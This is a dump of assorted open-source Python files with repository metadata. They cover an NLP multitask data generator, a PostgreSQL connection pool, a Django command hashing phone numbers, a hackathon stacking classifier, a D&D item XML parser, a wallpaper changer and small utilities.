        Problem: CWS|NER|weibo_ner&weibo_cws
        1. Dummy labels: CWS_label_ids: [0,0,0] ...
        2. Blablabla
        3. Sample, say (weibo_ner&weibo_cws)
        4. loss multipliers: {'CWS_loss_multiplier': 0, ..., 'weibo_ner_loss_multiplier': 1, ...}
        ...

    Arguments:
        params {Params} -- params
        mode {mode} -- mode
        epoch {int} -- epochs to run (Deprecated -- unused in the body)
    """
    # example
    # problem_list: ['NER', 'CWS', 'weibo_ner', 'weibo_cws']
    # problem_chunk: [['NER'], ['CWS'], ['weibo_ner', 'weibo_cws']]
    problem_list = []
    problem_chunk = []
    for problem_dict in params.run_problem_list:
        problem_list += list(problem_dict.keys())
        problem_chunk.append(list(problem_dict.keys()))

    # get dummy labels
    def _create_dummpy_label(problem_type):
        if problem_type == 'cls':
            return 0
        else:
            return [0]*params.max_seq_len
    dummy_label_dict = {problem+'_label_ids': _create_dummpy_label(
        params.problem_type[problem]) for problem in problem_list if params.problem_type[problem] != 'pretrain'}

    # init gen
    gen_dict = {problem: params.read_data_fn[problem](params, mode)
                for problem in problem_list}

    while gen_dict:
        # sample problem to train
        # NOTE(review): if multitask_balance_type is neither 'data_balanced'
        # nor 'problem_balanced' (with >1 chunk), current_problem_chunk is
        # never assigned -- confirm the allowed values upstream.
        if len(problem_chunk) > 1:
            data_num_list = [params.data_num_dict[chunk[0]]
                             for chunk in problem_chunk]
            if params.multitask_balance_type == 'data_balanced':
                # sample chunks proportionally to their data size
                sample_prob = np.array(data_num_list) / np.sum(data_num_list)
                current_problem_chunk_ind = np.random.choice(
                    list(range(len(problem_chunk))), p=sample_prob)
                current_problem_chunk = problem_chunk[current_problem_chunk_ind]
            elif params.multitask_balance_type == 'problem_balanced':
                # sample chunks uniformly
                sample_prob = np.array(
                    [1]*len(data_num_list)) / np.sum([1]*len(data_num_list))
                current_problem_chunk_ind = np.random.choice(
                    list(range(len(problem_chunk))), p=sample_prob)
                current_problem_chunk = problem_chunk[current_problem_chunk_ind]
        else:
            current_problem_chunk = problem_chunk[0]

        # create loss multiplier: 1 for problems trained this batch, else 0
        loss_multiplier = {}
        for problem in problem_list:
            if problem in current_problem_chunk:
                loss_multiplier[problem+'_loss_multiplier'] = 1
            else:
                loss_multiplier[problem+'_loss_multiplier'] = 0

        base_dict = {}
        base_input = None
        for problem in current_problem_chunk:
            try:
                instance = next(gen_dict[problem])
            except StopIteration:
                # exhausted: restart the generator in train mode, drop it in eval
                if mode == 'train':
                    gen_dict[problem] = params.read_data_fn[problem](
                        params, mode)
                    instance = next(gen_dict[problem])
                else:
                    del gen_dict[problem]
                    continue
            except KeyError:
                continue

            base_dict.update(instance)
            # chained problems must share the exact same inputs
            if base_input is None:
                base_input = instance['input_ids']
            elif not params.augument_mask_lm:
                assert base_input == instance[
                    'input_ids'], 'Inputs id of two chained problem not aligned. Please double check!'

        if not base_dict:
            continue

        # add dummpy labels
        for dummy_problem in dummy_label_dict:
            if dummy_problem not in base_dict:
                base_dict[dummy_problem] = dummy_label_dict[dummy_problem]
        # add loss multipliers
        base_dict.update(loss_multiplier)
        yield base_dict
| [
"junpang.yip@gmail.com"
] | junpang.yip@gmail.com |
50c69f457a69549e37c8d673248b6a8b5ea1b3a8 | 8f02d21497912679d6ab91ea382ac9c477bda4fe | /setup.py | fb31227d6331999511c7297da29c6fb9b29c9e53 | [
"MIT"
] | permissive | DouglasWilcox/tpRigToolkit-dccs-maya-plugins-rbfsolver | ae2291f3e7117010341faeb7881998ec885dc216 | 3503c9b3982fe550a3d53dde79d3bf427c1b2289 | refs/heads/master | 2021-03-13T14:24:55.464354 | 2020-02-11T00:28:31 | 2020-02-11T00:28:31 | 246,688,218 | 1 | 0 | null | 2020-03-11T22:00:02 | 2020-03-11T22:00:01 | null | UTF-8 | Python | false | false | 104 | py | from setuptools import setup
from tpRigToolkit.dccs.maya.plugins.rbfsolver import __version__
setup()
| [
"tpovedatd@gmail.com"
] | tpovedatd@gmail.com |
e55349cdae31ad6838c68bcf8a78353c4625794a | 1e0355b293100873cedfcac789655a35180781db | /BOJ1541.py | 80f1eee1110f147baa91c39f0bbea9e2989c2d24 | [
"MIT"
] | permissive | INYEONGKIM/BOJ | 47dbf6aeb7a0f1b15208866badedcd161c00ee49 | 5e83d77a92d18b0d20d26645c7cfe4ba3e2d25bc | refs/heads/master | 2021-06-14T13:50:04.124334 | 2021-03-09T14:04:14 | 2021-03-09T14:04:14 | 168,840,573 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 164 | py | s=input().split("-")
if s[0]=="":
res=0
else:
res=sum(map(int,s[0].split("+")))
for i in range(1,len(s)):
res-=sum(map(int,s[i].split("+")))
print(res)
| [
"noreply@github.com"
] | INYEONGKIM.noreply@github.com |
8d796048dae5c5b5f7ff417ad810b0eb8ceedf95 | 08d6297654bce1043c7a1f466d1e94a0edbe127b | /DatabaseConnectionPool.py | 1a520abddc676328652b298dcc47c1b901a63d06 | [] | no_license | xzf199358/grace_jiubao | 6db0a21aa8ef8e8d4639bf22dcf5682993005e5e | afc5274e4f9f8adebae3940256a61adaec8443a5 | refs/heads/master | 2023-01-09T12:51:21.034087 | 2020-11-14T09:07:51 | 2020-11-14T09:07:51 | 312,781,563 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,741 | py | # -*- coding: UTF-8 -*-
import sys
import psycopg2
from LoggerModule import Logger
from ConfigManager import ConfigParameter as configs
from DBUtils.PooledDB import PooledDB
import ToolFunctions
class DatabaseConnectionPool:
    """Process-wide PostgreSQL connection pool built on DBUtils' PooledDB
    over psycopg2.  All limits and credentials come from
    ConfigManager.ConfigParameter (imported as `configs`).
    """
    # shared pool instance; create_pool() must be called before get_*()
    pool = None
    @classmethod
    def create_pool(cls):
        """Create the pool from configuration.

        Returns the class on success; on failure logs and exits the
        process with code 301 via ToolFunctions.sys_exit.
        """
        try:
            cls.pool = PooledDB(psycopg2, maxconnections = configs.max_connection_num,
                                mincached = configs.min_cached_num, maxcached = configs.max_cached_num,
                                maxshared = configs.max_shared_num, application_name = configs.application_name_for_database_connection,
                                host = configs.database_host, port=configs.database_port, dbname = configs.database_name,
                                user = configs.database_user_name, password=configs.database_password)
            return cls
        except Exception as e:
            Logger.fatal("failed to initialize Database Connection Pool. System is exiting!")
            Logger.fatal(repr(e))
            ToolFunctions.sys_exit(301)
    @classmethod
    def get_connection(cls):
        """Return a (possibly shared) pooled connection, or None on error."""
        try:
            return cls.pool.connection()
        except Exception as e:
            Logger.error("when get connection from pool!")
            Logger.error(repr(e))
            return None
    @classmethod
    def get_dedicated_connection(cls): # dedicated connection: the DB server devotes one backend process to it, as opposed to a shared connection
        """Return a dedicated (non-shared) pooled connection, or None on error."""
        try:
            return cls.pool.dedicated_connection()
        except Exception as e:
            Logger.error("when get dedicated connection from pool!")
            Logger.error(repr(e))
            return None
# db_pool = DatabaseConnectionPool
| [
"1217158614@qq.com"
] | 1217158614@qq.com |
adb466e272744c048c455a8aebc7292a0997e0cf | da932161e15ddcd9dcbd50ccc2503c85cfb9d5ab | /ces_admin/management/commands/hash_identities.py | 58f40217c392cf5305c477c61c2f729cf311dd17 | [
"MIT"
] | permissive | datamade/coordinated-entry-screening | 9c7c01a4f5df22cb4de509f510b93f74a22ee3db | 29724ee36530f81c8b9a2d4720963de619322d12 | refs/heads/master | 2020-03-23T20:56:19.559632 | 2019-07-15T01:25:09 | 2019-07-15T01:25:09 | 142,072,104 | 2 | 0 | MIT | 2019-07-15T01:25:10 | 2018-07-23T21:37:19 | Python | UTF-8 | Python | false | false | 2,070 | py | import datetime
import hashlib
from django.core.management.base import BaseCommand
from django.db.models import Q
from django.contrib.auth.hashers import make_password, check_password
from rapidsms.models import Connection
from decisiontree.models import Session
class Command(BaseCommand):
    help = '''
    This command hashes identities (i.e., phone numbers) of users
    who canceled, completed, or abandoned the survey.
    '''
    def handle(self, *args, **options):
        """Hash phone-number identities of finished or stale survey sessions."""
        started_at = str(datetime.datetime.now())
        self.stdout.write(self.style.NOTICE('{}: Run the script!').format(started_at))
        # Django's make_password is a salted one-way hash; alias it so the
        # intent of the call below is explicit.
        hash_identity = make_password
        # Exclude sessions from the last five minutes: RapidSMS/Twilio may
        # still need the raw phone number while a conversation settles.
        five_minutes_ago = datetime.datetime.now() - datetime.timedelta(minutes=5)
        one_day_ago = datetime.datetime.now() - datetime.timedelta(days=1)
        finished = Q(session__state_id__isnull=True, \
                     session__last_modified__lte=five_minutes_ago)
        abandoned = Q(session__last_modified__lte=one_day_ago)
        # identity__startswith='+1' skips rows that were already hashed as
        # well as web sessions.
        queryset = (Connection.objects
                    .filter(finished | abandoned)
                    .filter(identity__startswith='+1')
                    .distinct())
        for connection in queryset:
            connection.identity = hash_identity(connection.identity)
            connection.save()
            self.stdout.write(self.style.SUCCESS('Successfully hashed an identity'))
"reginafcompton@gmail.com"
] | reginafcompton@gmail.com |
816f788b6bec5124501507fbd09cda758212d57a | 9a140773c0e1267ab39f09f363efd412bbcc390e | /McKinseyHackaton/Stacking/meta_classifier.py | 21a1367fe9b63245c6b098f2409308412a25f8f3 | [] | no_license | dkajtoch/Data-Science-Projects | 5aa904bad5b7ee88a5ab0dd2695d3e7341f1e000 | 3d17081686924214ae509f91ede045ad5d7c129d | refs/heads/master | 2020-03-23T10:56:02.302754 | 2018-08-12T16:11:23 | 2018-08-12T16:11:23 | 141,471,064 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,629 | py | import pandas as pd
import numpy as np
import sys
# --------------------------------------------------
# Custom scorer
# --------------------------------------------------
def probability_change(p, x):
    """Renewal probability after spending incentive ``x`` on a customer whose
    baseline renewal probability is ``p``.

    The uplift saturates as ``x`` grows and the result is capped at 1.0.
    """
    from numpy import exp
    effort = exp(-x/400.)
    uplift = 0.2*( 1. - exp(-2.)*exp( 2.*effort ) )
    res = p*(1. + uplift)
    if res <= 1.0:
        return res
    return 1.0
def optimal_incentives(prob, premium):
    """Mean best-achievable net revenue per customer.

    For each (renewal probability, premium) pair, numerically maximises
    ``premium * probability_change(p, x) - x`` over incentives
    ``x in [0, 1e5]`` and returns the average of the maxima.
    """
    from scipy.optimize import minimize_scalar
    best_negated = []
    for p, amount in zip(prob, premium):
        def neg_revenue(x, p=p, amount=amount):
            # Negated because minimize_scalar minimises; formula from McKinsey.
            return -( amount*probability_change(p, x) - x )
        result = minimize_scalar(neg_revenue,
                                 bounds=(0., 1.0E+05),
                                 method='bounded')
        best_negated.append(result.fun)
    return -np.mean(np.array(best_negated))
def custom_score(y_true, proba, premium, lam=1./9000.):
    """Competition score: currently just the mean optimal-incentive revenue.

    The original blended score (0.7*AUC + 0.3*scaled incentive revenue)
    is kept below, disabled; ``y_true`` and ``lam`` are retained for that
    variant's signature.
    """
    from sklearn.metrics import roc_auc_score
    #res = 0.7 * roc_auc_score(y_true, proba) + \
    #      0.3 * optimal_incentives(proba, premium) * lam
    return optimal_incentives(proba, premium)
# --------------------------------------------------
# --------------------------------------------------
# Level-1 training data: out-of-fold probabilities from the three base models
# plus the target column.
data_train = pd.read_csv('./stacked_train_proba.csv', usecols=['xgboost','RF','NN','renewal'])
X = data_train[['xgboost','RF','NN']]
y = data_train['renewal']
# premium
premium = pd.read_csv('../data/train.csv', usecols=['premium'])
premium = np.float64(premium['premium'].tolist())
# add extra feature
#dat = pd.read_csv('../data/train.csv', usecols=['perc_premium_paid_by_cash_credit'])
#X['extra'] = dat['perc_premium_paid_by_cash_credit']
# meta classifier
# --------------------------------------------------
# CLI dispatch: 'validate' cross-validates the logistic-regression stacker,
# 'predict' fits on all data and writes test-set probabilities,
# 'majority' scores a simple average of the base-model probabilities.
if str(sys.argv[1]) == 'validate':
    print('Preparing for cross-validation')
    from sklearn.linear_model import LogisticRegression
    from sklearn.model_selection import StratifiedKFold
    from sklearn.metrics import roc_auc_score, log_loss
    # Heavily regularised meta-learner (C = 1e-4) over the 3 base outputs.
    clf = LogisticRegression(penalty='l2',
                             C=1.0E-04
                             )
    auc_tab = np.array([])
    loss_tab = np.array([])
    custom_tab = np.array([])
    skf = StratifiedKFold(n_splits=4, random_state=1234)
    for train_index, test_index in skf.split(X,y):
        X_train, X_test = X.iloc[train_index], X.iloc[test_index]
        y_train, y_test = y.iloc[train_index], y.iloc[test_index]
        premium_test = premium[test_index]
        clf.fit(X_train, y_train)
        proba = clf.predict_proba(X_test)
        auc = roc_auc_score(y_test, proba[:,1])
        loss = log_loss(y_test, proba)
        custom = custom_score(y_test.tolist(), proba[:,1], premium_test)
        auc_tab = np.append(auc_tab, auc)
        loss_tab = np.append(loss_tab, loss)
        custom_tab = np.append(custom_tab, custom)
    print('AUC: %.8f +/- %.8f' % (np.mean(auc_tab), np.std(auc_tab)))
    print('Loss: %.8f +/- %.8f' % (np.mean(loss_tab), np.std(loss_tab)))
    print('Custom: %.8f +/- %.8f' % (np.mean(custom_tab), np.std(custom_tab)))
elif str(sys.argv[1]) == 'predict':
    from sklearn.linear_model import LogisticRegression
    from sklearn.model_selection import GridSearchCV
    # Same hyper-parameters as the 'validate' branch, fit on all data.
    clf = LogisticRegression(C=0.0001, penalty='l2')
    clf.fit(X, y)
    # Predict
    X_test = pd.read_csv('./stacked_test_proba.csv', usecols=['xgboost','RF','NN'])
    # add extra feature
    #dat = pd.read_csv('../data/test.csv', usecols=['perc_premium_paid_by_cash_credit'])
    #X_test['extra'] = dat['perc_premium_paid_by_cash_credit']
    print('Writing predictions')
    #proba = clf.best_estimator_.predict_proba(X_test)[:,1]
    proba = clf.predict_proba(X_test)[:,1]
    # export to a file
    export_data = pd.read_csv('../data/test.csv', usecols=['id', 'premium'])
    export_data.insert(loc=1, column='renewal', value=proba)
    export_data.to_csv('../data/test_proba.csv', index=False)
elif str(sys.argv[1]) == 'majority':
    from sklearn.model_selection import StratifiedKFold
    from sklearn.metrics import roc_auc_score, log_loss
    # Baseline "ensemble": unweighted mean of the three base probabilities,
    # expanded into a 2-column (neg, pos) array for log_loss.
    proba = np.float64(X.mean(axis=1).tolist())
    proba = np.column_stack((1.-proba, proba))
    auc_tab = np.array([])
    loss_tab = np.array([])
    custom_tab = np.array([])
    skf = StratifiedKFold(n_splits=4, random_state=1234)
    for train_index, test_index in skf.split(np.zeros(len(y)),y):
        p = proba[test_index]
        y_test = y.iloc[test_index]
        premium_test = premium[test_index]
        auc = roc_auc_score(y_test, p[:,1])
        loss = log_loss(y_test, p)
        custom = custom_score(y_test.tolist(), p[:,1], premium_test)
        auc_tab = np.append(auc_tab, auc)
        loss_tab = np.append(loss_tab, loss)
        custom_tab = np.append(custom_tab, custom)
    print('AUC: %.8f +/- %.8f' % (np.mean(auc_tab), np.std(auc_tab)))
    print('Loss: %.8f +/- %.8f' % (np.mean(loss_tab), np.std(loss_tab)))
    print('Custom: %.8f +/- %.8f' % (np.mean(custom_tab), np.std(custom_tab)))
    # Predict
    # X_test = pd.read_csv('./stacked_test_proba.csv', usecols=['xgboost','RF','NN'])
    # add extra feature
    #dat = pd.read_csv('../data/test.csv', usecols=['perc_premium_paid_by_cash_credit'])
    #X_test['extra'] = dat['perc_premium_paid_by_cash_credit']
    # print('Writing predictions')
    #proba = clf.best_estimator_.predict_proba(X_test)[:,1]
    # proba = np.float64(X_test.mean(axis=1))
    # export to a file
    # export_data = pd.read_csv('../data/test.csv', usecols=['id', 'premium'])
    # export_data.insert(loc=1, column='renewal', value=proba)
    # export_data.to_csv('../data/test_proba.csv', index=False)
| [
"dkajtoch@gmail.com"
] | dkajtoch@gmail.com |
ac88c82105770dd7f62ae1df6606974dad116b74 | 38969896f332a1d9997ecc946ac805e36297d472 | /scripts/change-background.py | bc317cb6356ee601745634906fd540999d1f3a34 | [] | no_license | tml/forkmydots | e823c68aadda9fbd6cfe6de3568ad16b9352fe57 | 8ff97a587f4ab679fd9ce11af11632563458dfb3 | refs/heads/master | 2021-01-18T07:49:39.315566 | 2013-05-21T16:34:46 | 2013-05-21T16:34:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,713 | py | #!/usr/bin/env python
#
# change-background.py
#
# A script to change to a random background image
# Originally written to use gconf to accomplish this end, it now uses
# xloadimage -onroot which is slightly less presumptuous about how the user's
# system is set up initially (considering that xloadimage is a much smaller set
# of dependencies than gconf).
#
#(c) 2012, Wayne Warren <steven.w.warren@gmail.com>
#(c) 2004, Davyd Madeley <davyd@madeley.id.au>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or(at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
import sys
import os
import random
import mimetypes
# Backgrounds live under ~/visual/backgrounds; "current" is a symlink to the
# image currently in use.
home = os.getenv("HOME")
backgrounds = home + "/visual/backgrounds/"
bg_ln_name = os.path.join( backgrounds , "current" )
def get_files_recursively(rootdir):
    """Recursively collect the paths of all files under *rootdir*."""
    found = []
    for dirpath, _subdirs, filenames in os.walk(rootdir):
        found.extend(os.path.join(dirpath, name) for name in filenames)
    return found
# TODO check for the presence of xloadimage, exit gracefully if missing
# Get the files from the backgrounds folder and keep only images (by MIME type).
dir_items = get_files_recursively(backgrounds)
items = []
for item in dir_items:
    mimetype = mimetypes.guess_type(item)[0]
    if mimetype and mimetype.split('/')[0] == "image":
        items.append(item)

# Nothing to choose from: bail out instead of crashing on randint/indexing.
if not items:
    sys.exit(1)

# Determine the currently used background, if any.
# BUGFIX: the original used `if ~ os.path.exists(...)`; `~` is bitwise NOT,
# which is truthy for both True (-2) and False (-1), so readlink ran
# unconditionally and crashed when the link was missing.
if os.path.islink(bg_ln_name):
    current_bg = os.readlink(bg_ln_name)
else:
    current_bg = None

# Pick a random image different from the current one (when more than one
# candidate exists; otherwise the loop below would never terminate).
item = random.randint(0, len(items) - 1)
while len(items) > 1 and items[item] == current_bg:
    item = random.randint(0, len(items) - 1)

# Replace the "current" symlink. lexists (not exists) also catches a broken
# symlink, which would otherwise make os.symlink fail.
if os.path.lexists(bg_ln_name):
    os.unlink(bg_ln_name)
os.symlink(items[item], bg_ln_name)

# Finally, set the new background.
if os.path.exists(bg_ln_name):
    os.system("$(which xloadimage) -onroot -display :0 " + bg_ln_name)
sys.exit()
| [
"waynr@sdf.org"
] | waynr@sdf.org |
285b78fc7266d2063001632fedcddacbfe321900 | 2d9b490f7aa764aca222baa158cc6e071e159450 | /persistence/xml_parser.py | 6deb416ef66e738eb2a65b6e274c1ee2a4e3ef1c | [] | no_license | Phaetec/rpscene | 44e81b71441bfe40be73b7b94cf4bb7429599be2 | 3a012bde79b5dae5f4199201bbf637df848d5c2d | refs/heads/develop | 2022-12-08T06:28:13.234075 | 2020-09-01T10:01:11 | 2020-09-01T10:01:11 | 164,128,854 | 1 | 0 | null | 2022-11-22T06:29:26 | 2019-01-04T16:16:30 | Python | UTF-8 | Python | false | false | 6,364 | py | import re
from defusedxml.ElementTree import parse
from django.core.exceptions import ObjectDoesNotExist
from items.errors import ItemAlreadyExists
from items.models import Armor, BonusModifier, Money
from .errors import XMLModifierCategoryNotRecognized
# NOTES:
# detail tag: contains the rarity as well as information such as "cursed" or "requires attunement"
# roll: may appear multiple times. Describes either damage or other effects. May contain variables such as SPELL.
#  - still needs to be worked into the model
# range: the range, if present (weapons, spells?)
# dmg1: damage, if the weapon has an attack value
# dmg2: e.g. two-handed damage on versatile weapons. No other use observed so far.
# dmgType: damage type, unfortunately only as an abbreviation; needs more research into what is meant
# property: things like 2H, Automatic? - possibly pistols; light, versatile, etc. Usually 1- or 2-letter abbreviations
# modifier: all the +X weapons have one, for example. Usually several, e.g. on damage and on the attack roll
#  - contains an attribute "category" with the values "Bonus", "Skills" or "Ability Score"
# value: value of the item in gold
# stealth: if 1, the equipment imposes disadvantage on stealth checks
# strength: requires at least the tag's value as Strength for the item to be worn
# ac: the AC that the equipment grants
def convert_type(typename):
    """Map an XML armor-type abbreviation to its human-readable category.

    Raises TypeError for unknown abbreviations.
    """
    mapping = {
        "LA": "Light Armor",
        "MA": "Medium Armor",
        "HA": "Heavy Armor",
        "S": "Shield",
    }
    try:
        return mapping[typename]
    except KeyError:
        raise TypeError("Item Type not recognized")
def parse_modifiers(modifiers, item):
    """Parse modifier elements and create corresponding objects.

    modifiers: iterable of <modifier> elements, each carrying a 'category'
    attribute; item: the model instance the modifiers belong to.
    Raises XMLModifierCategoryNotRecognized for unknown categories.
    """
    for mod in modifiers:
        category = mod.attrib['category']
        text = mod.text
        if category == "bonus":
            # e.g. "attack rolls +1" -> applied_to="attack rolls", modifier="1".
            # BUGFIX: the pattern must be a raw string; "\+" is an invalid
            # escape sequence (DeprecationWarning since Python 3.6).
            applied_to, modifier = re.split(r"\+", text)
            mod = BonusModifier(belongs_to=item,
                                modifier=int(modifier.strip()),
                                applied_to=applied_to.strip())
            mod.save()
        elif category == "skills":
            # TODO
            pass
        elif category == "ability score":
            # TODO
            pass
        else:
            raise XMLModifierCategoryNotRecognized("Modifier not recognized")
def is_magic(item):
    """Return True when the item's <magic> child exists and its text is "1"."""
    magic_attr = item.find("magic")
    # BUGFIX: `find` returns None when the tag is missing, so the check must
    # be `is None`. The original `if not magic_attr` relied on Element
    # truthiness (deprecated), under which an Element with no children is
    # falsy -- a found <magic>1</magic> tag was therefore wrongly rejected.
    if magic_attr is None:
        return False
    return magic_attr.text == "1"
def parse_strength_requirement(item):
    """Return the item's minimum Strength requirement, or 0 if unspecified."""
    strength_var = item.find("strength")
    # BUGFIX: guard against a missing <strength> tag -- find() returns None,
    # and the original unconditional `.text` access raised AttributeError.
    if strength_var is None or strength_var.text is None:
        return 0
    try:
        return int(strength_var.text)
    except (TypeError, ValueError):
        # Non-numeric content is treated as "no requirement".
        return 0
def parse_details(detail):
    """Extract (requires_attunement, cursed, rarity) from a <detail> element.

    A missing element defaults to (False, False, "COMMON"); detail text with
    no recognised rarity keyword yields "NO_INFO".
    """
    if detail is None:
        return False, False, "COMMON"
    detailstring = detail.text
    attunement = "(requires attunement)" in detailstring
    cursed = "cursed" in detailstring
    # Order matters: "very rare" must be tested before "rare", and
    # "uncommon" before "common", because of substring containment.
    rarity_keywords = (
        ("artifact", "ARTIFACT"),
        ("legendary", "LEGENDARY"),
        ("very rare", "VERY_RARE"),
        ("rare", "RARE"),
        ("uncommon", "UNCOMMON"),
        ("common", "COMMON"),
    )
    for keyword, rarity in rarity_keywords:
        if keyword in detailstring:
            return attunement, cursed, rarity
    return attunement, cursed, "NO_INFO"
def parse_text(texts):
    """Join the text of all <text> elements, one line each (empty tags
    contribute a blank line)."""
    pieces = ("" if element.text is None else element.text for element in texts)
    return "".join(piece + "\n" for piece in pieces)
def create_armor(item):
    """Create and persist an Armor (plus its modifiers) from an <item> element.

    Raises ItemAlreadyExists when an armor with the same name is stored.
    """
    # TODO modifiers are stored but not otherwise factored into the stats.
    name = item.find("name").text
    armor_type = convert_type(item.find("type").text)
    magic = is_magic(item)
    attunement, cursed, rarity = parse_details(item.find("detail"))
    weight = float(item.find("weight").text)
    ac = int(item.find("ac").text)
    description = parse_text(item.findall("text"))
    stealth_disadvantage = item.find("stealth").text == "1"
    strength_requirement = parse_strength_requirement(item)
    try:
        Armor.objects.get(name=name)
    except ObjectDoesNotExist:
        armor = Armor(name=name, type=armor_type, magic=magic,
                      requires_attunement=attunement, cursed=cursed,
                      rarity=rarity, description=description, weight=weight,
                      ac=ac, stealth_disadvantage=stealth_disadvantage,
                      strength_requirement=strength_requirement)
        armor.save()
        parse_modifiers(item.findall("modifier"), armor)
    else:
        # The lookup succeeded, so the name is taken.
        raise ItemAlreadyExists("An Item with this name already exists.")
def create_money(item):
    """Create and persist a Money item from an <item> element.

    Raises ItemAlreadyExists when an item with the same name is stored.
    """
    name = item.find("name").text
    description = parse_text(item.findall("text"))
    weight = float(item.find("weight").text)
    if Money.objects.filter(name=name).exists():
        raise ItemAlreadyExists("An Item with this name already exists.")
    Money(name=name, description=description, weight=weight,
          type="Money", rarity="COMMON").save()
def parse_and_store_item(item):
    """Dispatch an <item> element to the right factory based on its type code."""
    item_type = item.find("type").text
    # Armor codes: LA, MA, HA (light/medium/heavy armor) and S (shield);
    # "$" marks money. Anything else is ignored.
    if item_type == "$":
        create_money(item)
    elif item_type in {"LA", "MA", "HA", "S"}:
        create_armor(item)
def parse_entities(file_path="CorePlusUAWithModern.xml"):
    """Parse the compendium XML at *file_path* and store every supported item.

    Items that already exist in the database are skipped silently.
    """
    root = parse(file_path).getroot()
    for child in root.findall('item'):
        try:
            parse_and_store_item(child)
        except ItemAlreadyExists:
            pass
    # Exploratory tag-dump code, kept disabled for reference:
    # for attrs in child:
    #     if attrs.tag not in ['weight', 'type', 'text', 'name', 'magic', 'detail', 'roll', 'range', 'dmg1',
    #                          'dmgType', 'property', 'dmg2', 'modifier', 'value', 'stealth', 'strength', 'ac']:
    #         print(attrs.tag)
    #         print(attrs.attrib)
    #         print('---')
| [
"alexander@schneider.gg"
] | alexander@schneider.gg |
8c74fecf0b15bc388c3ef543c49f558f6d4d39c6 | d40cc57c974e0233fe5dfe0d19f84de48f3f122a | /core/admin/__init__.py | 4c791a3e4f13f30eca58e68f59aa801f9bd926da | [] | no_license | DanielDiaz36/ecommerce-design | 40336181bc6a716a860c36892396f92b2ad6759f | 0a3d9af28f92af9edcb89c53ef90ab92c53bb923 | refs/heads/master | 2023-06-25T18:04:16.599222 | 2021-07-03T23:38:52 | 2021-07-03T23:38:52 | 298,940,933 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 804 | py | # -*- coding: utf-8 -*-
"""
This file is part of the GSM Mine Shop project.
Copyright (c) 2019 GSM MINE GROUP LLC.
For the full copyright and license information, please view the LICENSE
file that was distributed with this source code.
Developed by Outboss Development Team <support@outboss.io>
"""
from __future__ import unicode_literals
from django.utils.translation import ugettext_lazy as _
from django.contrib import admin
from .design import DesignAdmin
from .design_image import DesignImageAdmin
from .user_category import UserCategoryAdmin
from .design_category import DesignCategoryAdmin
from .country import CountryAdmin
# Brand the Django admin site (strings are lazily translated via ugettext).
admin.site.index_title = _('Inicio')
admin.site.site_header = _('Ecommerce Design Admin')
admin.site.site_title = _('Ecommerce Design Admin')
| [
"danieldiaz9211@gmail.com"
] | danieldiaz9211@gmail.com |
fc469c8bc5ffeef576be0f1bdbe4455672676d15 | 4d7a7698f74cfa730598b24524d7d17d135daf5b | /cbverifier/__init__.py | 2ab2038d582b773de99c5adaef8ef4703c665088 | [] | no_license | cuplv/verivita | 010b5d913fa25600d72980b3f9e4b45992b248b0 | 04e97a8bf582db10186b73a476fbecff1861e526 | refs/heads/master | 2021-03-27T14:19:54.315993 | 2018-09-10T16:10:20 | 2018-09-10T16:10:20 | 61,602,554 | 1 | 1 | null | 2018-11-11T19:53:29 | 2016-06-21T04:36:40 | Python | UTF-8 | Python | false | false | 21 | py | # package cbverifier
| [
"sergio.mover@gmail.com"
] | sergio.mover@gmail.com |
843e4db80ea0201c3077569bb569093601a79a4c | 73afbee610a155a5c19feb4c6aed6980c00dd7f5 | /railwayMgt/ticketCRUD/apps.py | aaf68c300f500bb3e1c0031d536fb84e099914a4 | [] | no_license | Rajat-Kaushik/RailwayManagementCRUD | 528ff21fc5ccb791d48d2459a3099e696c7a24ef | 43151bad1cdfd4c081a03008d162874ffbe62689 | refs/heads/main | 2023-04-10T05:50:55.434326 | 2021-04-26T04:25:46 | 2021-04-26T04:25:46 | 360,053,813 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 95 | py | from django.apps import AppConfig
class TicketcrudConfig(AppConfig):
    """Django application configuration for the ticketCRUD app."""
    name = 'ticketCRUD'
| [
"kaushik.rajat@outlook.com"
] | kaushik.rajat@outlook.com |
7423be29bd52bf57c1f3fd80469224359b422ebc | c1fa6c50d382ee37d5010560c3a3fdd85da26fa5 | /first_bot.py | 09be11289e744a73003d0a204086a86a4bcf9cfc | [] | no_license | alexanderbuc/CMPM146---P2 | eb372277b8863597b77dcdd35b171a9ca420e07f | 87d302aa7a250a4d5518e6c85eb2521560bcf59d | refs/heads/master | 2016-08-04T09:37:45.057343 | 2015-04-13T01:20:57 | 2015-04-13T01:20:57 | 33,743,602 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 57 | py | def think(state, quip):
return state.get_moves()[0]
| [
"abuc@ucsc.edu"
] | abuc@ucsc.edu |
4e1444c19b01a44bf600264d57a586ce9312006e | d3f7e6b5ba96c5c563678f1ae83361b198105ef7 | /www/config_default.py | 2bc4ccb388a5839ecd39c03d8cc2502375661cb7 | [] | no_license | Aiss86/awesome-python3-webapp | b4b9504b76e15f51c0fa2ee4e845a2c10c594762 | cb5494b4f95e20aa748c3c84070d60dbff62f95e | refs/heads/master | 2021-05-04T02:29:28.610949 | 2016-11-01T09:17:52 | 2016-11-01T09:17:52 | 71,338,736 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 336 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''
Default configuration.
'''
__author__ = 'Aiss86'
# Default configuration; environment-specific configs override these values.
configs = {
    # Development default; disable in production.
    'debug': True,
    # MySQL connection parameters.
    'db': {
        'host': '127.0.0.1',
        'port': 3306,
        'user': 'root',
        'password': '123456',
        'db': 'awesome'
    },
    # Secret used to sign session cookies.
    'session': {
        'secret': 'Awesome'
    }
} | [
"mali@sgepri.sgcc.com.cn"
] | mali@sgepri.sgcc.com.cn |
